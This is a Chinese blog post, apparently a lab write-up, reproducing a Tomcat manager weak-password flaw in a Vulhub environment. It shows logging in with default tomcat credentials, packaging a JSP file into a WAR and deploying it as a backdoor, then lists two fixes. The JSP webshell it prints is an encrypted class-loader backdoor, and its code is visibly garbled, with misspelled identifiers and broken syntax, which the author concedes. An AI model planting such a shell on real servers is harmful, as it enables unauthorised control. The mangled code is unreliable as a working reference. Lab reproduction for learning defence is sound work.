初识tomcat漏洞--tomcat弱密码漏洞复现

1.实验目的

1、能成功搭建漏洞测试与测试工具所需的运行环境

2、能成功利用漏洞原理测试复现漏洞

2覆盖知识

配置文件处理不当导致可被弱密码登录

Getshell漏洞注入

3实验环境与操作

实验环境

1、VMware Workstation 16

2、Ubuntu 20.4

3、Vulhub靶场

4、kali

实验步骤

1.在Ubuntu中搭建相应的环境

cd vulhub/tomcat/tomcat8

docker-compose up –d

搭建完成后查看环境所开启的端口为8080,然后打开相应的服务:192.168.32.135:8080

  1. 复现开始

进入后台,登录用户密码为tomcat

进入后台后,进行war包制作

<%@pageimport="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader(U(ClassLoader c)(super(c);)publicClass g(byte [b)(return super. defineClass(b,0,b.length))%><%if(request.getParameter("pass")!=null)(String k=

(""+UUlD.randomUUID0).replace("-"").substring(1,6);session.putValue("u",k);out.print(k);return;)Cipher c=Cipher.getlnstance

("AES");c.init(2,newSecretKeySpec((session.getValue("u")+ ").getBytes(),"AES"));newU(this.getclass().getClassoader).g(c.dFinal(newsun.misc.BASE64Decoder().decodeBuffer(request.getReader().readine)).newInstande.equals(pageContext);%>

参照网上的代码先进行jsp文件的制作,时间紧急没有对它进行查看然后将它转化为war包

jar -cvf testt.war “test.jsp”

在deploy上传war包

war包的路径为网站根目录/war包名称/后门名称(eg:/testt/test.jsp)

虽然有代码错误但是我们可以看到通过对tomcat弱口令登录之后我们确实在deploy成功上传了我们想要执行的shell的代码,这可以看出确实能够做出恶意的操作。

修补方案

  1. 可以修改配置文件,将存在后门的用户密码账号设置符合复杂度的要求;
  2. 限制对于manage/html目录访问的权限。

  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值